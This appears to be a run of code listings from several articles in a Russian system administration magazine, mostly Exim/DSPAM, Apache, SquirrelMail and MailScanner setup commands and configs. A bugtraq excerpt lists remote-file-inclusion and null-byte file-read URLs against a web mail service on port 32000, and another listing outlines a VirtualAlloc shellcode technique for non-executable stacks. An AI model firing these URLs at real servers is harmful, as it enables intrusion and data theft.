ICF Team Spam Filter on $primary_hostname, $tod_full\n X-SENDER-INFO: ${if def:authenticated_id {ID - ${authenticated_id},}} \ ${if def:authenticated_sender {authenticated_sender - ${authenticated_sender},}} \ ${if def:sender_ident {rfc1413(ident) - ${sender_ident},}} \ ${if def:originator_uid {UID - ${originator_uid},}} \ ${if def:originator_gid {GID - ${originator_gid}}} local_parts = !addham:!addspam:!ham:!spam:!sexy transport = spamcheck_transport require_files = /usr/local/dspam/var/spool:/usr/local/dspam/bin/dspam spam_reject: driver = redirect check_local_user user = exim group = mail headers_add = "X-DSPAM-Rreport: Rejected" condition = ${if eq {$h_X-DSPAM-Result:}{Spam}{yes}{no}} allow_fail = true require_files = $local_part:/usr/local/vmail/${domain}/spam/$local_part errors_to = "" data = :blackhole: more = false spamcheck_transport: driver = pipe command = "/usr/sbin/exim -oi -oMr spam-scanned -bS" transport_filter = /usr/local/dspam/bin/dspam --stdout --deliver=innocent,spam --user $local_part@$domain --mail-from "${lc:$sender_address}" --rcpt-to "${lc:$local_part}@${lc:$domain}" user = exim group = mail use_bsmtp = true home_directory = "/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" delivery_date_add = true return_path_add = true envelope_to_add = true log_fail_output = true log_defer_output = true return_fail_output = true message_prefix = "" message_suffix = "" temp_errors = * addspam: driver = pipe command = /usr/local/dspam/bin/dspam --user ${lc:$sender_address} --class=spam --source=error return_path_add = false return_fail_output = true log_output = true home_directory = "/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" user = exim group = mail message_prefix = "" message_suffix = "" falsepositive: driver = pipe command = /usr/local/dspam/bin/dspam --user ${lc:$sender_address} --class=innocent --source=error return_path_add = false return_fail_output = true log_output = true home_directory = "/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" user = exim group = mail message_prefix = "" message_suffix = "" # /usr/local/etc/rc.d/030.exim.sh restart # cd /usr/ports/www/apache13-modssl # make WITH_APACHE_SUEXEC=yes APACHE_SUEXEC_DOCROOT=/usr/local/www/vhosts APACHE_SUEXEC_UIDMIN=50 APACHE_SUEXEC_GIDMIN=5 # make # make install # cd /usr/ports/www/mod_perl # make all install clean # cd /usr/ports/graphics/p5-GD-Graph3d/ # make all install clean # cd /usr/ports/lang/php4-extensions # make all install clean AddType application/x-httpd-php .php .phtml AddType application/x-httpd-php-source .phps NameVirtualHost * # CGI-интерфейс DSPAM ServerName dspam.test.com ServerAlias dspam.test.com Options Includes Indexes FollowSymLinks ExecCGI DocumentRoot /usr/local/www/vhosts/dspam.test.com User exim Group mail Options Includes Indexes FollowSymLinks ExecCGI AllowOverride All Order allow,deny Allow from all DirectoryIndex index.html AddHandler cgi-script .cgi PerlSendHeader On AddHandler cgi-script .cgi PerlHandler Apache::Registry ErrorLog /usr/local/www/logs/dspam.test.com/errors.log CustomLog /usr/local/www/logs/dspam.test.com/access.log common #Веб-интерфейс SquirrelMail ServerName mail.test.com ServerAlias test.com Options Includes Indexes FollowSymLinks MultiViews DocumentRoot /usr/local/www/vhosts/mail.test.com DirectoryIndex index.php index.phtml index.html ErrorLog /usr/local/www/logs/mail.test.com/errors.log CustomLog /usr/local/www/logs/mail.test.com/access.log common # cd /usr/local/www # mkdir -p vhosts/dspam.test.com vhosts/mail.test.com logs/dspam.test.com logs/mail.test.com # touch logs/dspam.test.com/access.log logs/mail.test.com/access.log logs/dspam.test.com/errors.log logs/mail.test.com/errors.log # chown -R www:www logs # cd vhosts/dspam.test.com # cp -R /usr/Install/dspam-3.4.8/cgi/* . # cd ../ # chown -R exim:mail dspam.test.com #cat > .htaccess << "EOF" AuthType Basic AuthName "DSPAM Statistic Server" AuthUserFile /usr/local/www/passwd/htpaasswd require valid-user EOF # chown www:www .htaccess # chmod 640 .htaccess # mkdir /usr/local/etc/apache/htpasswd # htpasswd -c /usr/local/etc/apache/htpasswd/htpasswd user@test.com # chown www:www /usr/local/etc/apache/htpasswd/htpasswd # chmod 640 /usr/local/etc/apache/htpasswd/htpaswd # cd /usr/ports//mail/squirrelmail # make all install clean # cd /usr/local/www/vhosts/mail.test.com # cp -R ../../squirrelmail/* . # cd ../ # chown -R www:www mail.test.com # cd mail.test.com # ./configure apache_enable="YES" # cd /usr/local/etc/rc.d # cp apache.sh 060.apache.sh # ./060.apache.sh start ----------------------------------------------------------------------------------------------------------------- bugtraq, стр. 53 http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/dir/include.html?lang=[file]%00 http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; Example (using non-IE/Mozilla/Firefox browser): http://[host]:32000/mail/index.html?/mail/index.html? default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 ----------------------------------------------------------------------------------------------------------------- Защищаем Windows-системы с помощью CORE FORCE Сергей Яремчук This policy denies to write and delete files and folder inside the windows and programs folder. This policy enables outgoing SMB connections.
----------------------------------------------------------------------------------------------------------------- Расширяем возможности MailScanner Сергей Яремчук # tar xzvf mailwatch-1.0.2.tar.gz # su mailwatch # /etc/init.d/mysqld start # mysql –u root -p < create.sql # mysql –u root -p mysql> SHOW TABLES; mysql> DESCRIBE users; mysql> INSERT INTO users VALUES ('grinder@test.ru',md5('pasword'),'sergej','A','1'); mysql> quit my($db_name) = 'mailscanner'; my($db_host) = 'localhost'; my($db_user) = 'mailwatch'; my($db_pass) = 'password'; # mv MailWatch.pm /opt/MailScanner/lib/MailScanner/MailScanner/CustomFunctions # mv SQLBlackWhiteList.pm /opt/MailScanner/lib/MailScanner/MailScanner/CustomFunctions # mv mailscanner /var/www/html/ # chown root:apache /var/www/html/mailscanner/images # chmod ug+rwx /var/www/html/mailscanner/images # chown root:apache /var/www/html/images/cache # chmod ug+rwx /var/www/html/images/cache // Database settings define(DB_TYPE, 'mysql’); define(DB_USER, 'mailwatch'); define(DB_PASS, 'password'); define(DB_HOST, 'localhost'); define(DB_NAME, 'mailscanner'); # mv conf.php.example conf.php # cp /var/www/html/mailscanner/mailq.php /usr/local/bin # crontab -e 0-59 * * * * /usr/local/bin/mailq.php Always Looked Up Last = &MailWatchLogging Detailed Spam Report = yes Quarantine Whole Message = yes Quarantine Whole Message As Queue Files = no Include Scores In SpamAssassin Report = yes Quarantine User = root QuarantineGroup = apache # т.е. та же что и у веб-сервера Quarantine Permissions = 0660 # И для редактирования спам-списков. Is Definitely Not Spam = &SQLWhitelist Is Definitely Spam = &SQLBlacklist # /opt/MailScanner/bin/check_mailscanner */5 * * * * root /usr/bin/mrtg /etc/mrtg/mailscanner-mrtg # make install # wget -c http://www.while.homeunix.net/mailstats/Vispan-2.0.2.tar.gz # tar xzvf Vispan-2.0.2.tar.gz # cd Vispan-2.0.2 # perl Makefile.PL # Использование sendmail для блокировки спамерских адресов UseAccess = 0 # Использование IPtables для блокировки спамерских адресов. # Одновременное использование UseAccess и UseIPTables смысла не имеет UseIPTables = 1 # Использование эвристического удаления адресов из блокировки. Иначе будет сохраняться весь список спамеров UseHeuristics = 1 # Первичная блокировка адреса в минутах, далее время будет постоянно удваиваться BlockTime = 7200 # 5 дней # Адреса, которые не будут блокироваться. Можно задать одиночный IP или диапазон: # 192.168.0.0-192.168.0.10 или 192.168.0.1/24 WhiteList = 192.168.0.1 192.168.0.2 */10 * * * * root /usr/local/bin/Vispan ----------------------------------------------------------------------------------------------------------------- Cудьба shell-кода на системах с неисполняемым стеком Крис Касперски Листинг 1. Последовательность вызова функций, реализующих атаку типа commit-n-copy VirtualAlloc(REMOTE_BASE, SHELLCODE_LENGTH, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(REMOTE_BASE, SHELLCODE_BASE, SHELLCODE_LENGTH); GOTO shell_code; Листинг 2. Функция VirtualAlloc и ее прототип LPVOID VirtualAlloc ( LPVOID lpAddress, SIZE_T dwSize, WORD flAllocationType, DWORD flProtect ); ----------------------------------------------------------------------------------------------------------------- Переходим от VBScript к ASP и ASP.NET. Безопасность и синтаксис Иван Коробко <%Script Language="VBScript"%> <%Script Language="JScript"%> <%@ Language=VBScript CODEPAGE=1251%> Заголовок страницы … <% … ' отображение на экране содержимого переменной Response.write variable %> X:\SETUP\SETUP.EXE /NO_BSLN_CHECK comAuthenticationLevel= PktPrivacy comImpersonationLevel= Impersonate comAuthenticationLevel="Default|None|Connect|Call|Pkt|PktIntegrity|PktPrivacy"; comImpersonationLevel="Default|Anonymous|Identity|Impersonate|Delegate" <% strMsgBox="Привет" response.write(strMsgBox) %> <% Dim strMsgBox As String strMsgBox="Привет" response.write(strMsgBox) %> Explicit = "False" <% Dim strMsgBox strMsgBox="Привет" response.write(strMsgBox) %> Dim Array(100) T="" T=VarType(Array) MsgBox T <% Response.Write(VartType(Parametr)) %> <%@ Striсt="True" %> Striсt = "True" <% Response.Write "Привет" %> <% Response.Write ("Привет") %> Set obj=CreateObject("Adodb.Connection") <% Set obj=Server.CreateObject("Adodb.Connection") %> <% obj=Server.CreateObject("Adodb.Connection") %> <%@ PageASPCompat="True" %> Tru Code Cath err as Exception Response.write(err) End Try